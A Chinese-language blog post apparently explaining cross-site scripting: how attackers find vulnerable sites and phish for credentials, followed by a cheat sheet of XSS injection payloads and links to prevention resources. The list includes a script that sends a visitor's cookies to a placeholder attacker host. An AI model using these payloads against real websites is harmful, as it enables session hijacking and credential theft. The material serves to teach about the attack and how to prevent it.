Cross Site Scripting vulnerability (XSS)跨網站功擊:
跨網頁攻擊是利用動態網頁的特性、網頁中的程式錯誤,以及利用開發者沒有嚴格限制回傳參數及過濾輸入之特殊字元,將具攻擊性的JavaScript、VB Script、ActiveX,或FLASH程式碼置入而所進行的攻擊。攻擊者必須利用跨網頁攻擊的特性以社交工程的方式,讓被攻擊者上勾。
首先,攻擊者會找尋目標,利用簡單的檢測手法[ alert(‘Hello') ]尋找擁有此弱點的網站。然後,攻擊者便可建立跟原本的網頁很類似的網頁登入畫面在自己的伺服器上,最後,再將包裝好的URL以社交工程手法,欺騙使用者上勾。待成功攻擊之後,攻擊者便可利用蒐集來的帳號和密碼進行資料竊取。
各種 XSS 常見攻擊語法
<script>[code]</script>
<body onload="[code]">
<a href="javasript:[code]">
<img src="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
<img src=&{[code]};>
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<iframe src="vbscript:[code]">
<a href="about:<sript>[code]</script>">
<xml src="javascript: [code]">
<script>alert(document.cookie)</script>
<script>document.write(document.cookie);</script>
<script>document.location='http://www.xxx.com/cookie.php?cookie='+escape(document.cookie) </script>
[code] = 例如: alert(“Hello World”)
XSS相關參考網址:
Cross Site Scripting questions and answers
http://www.cgisecurity.com/articles/xss-faq.shtml
Apache Cross Site Scripting Info
http://httpd.apache.org/info/css-security/
How to prevent cross-site scripting security issues
http://support.microsoft.com/kb/q252985/
Information on Cross-Site Scripting Security Vulnerability
http://www.microsoft.com/technet/archive/security/news/crssite.mspx?mfr=true
Microsoft Anti-Cross Site Scripting Library V1.0
http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92-7AD9-496C-9A89-AF08DE2E5982&displaylang=en
0 張貼意見:
張貼意見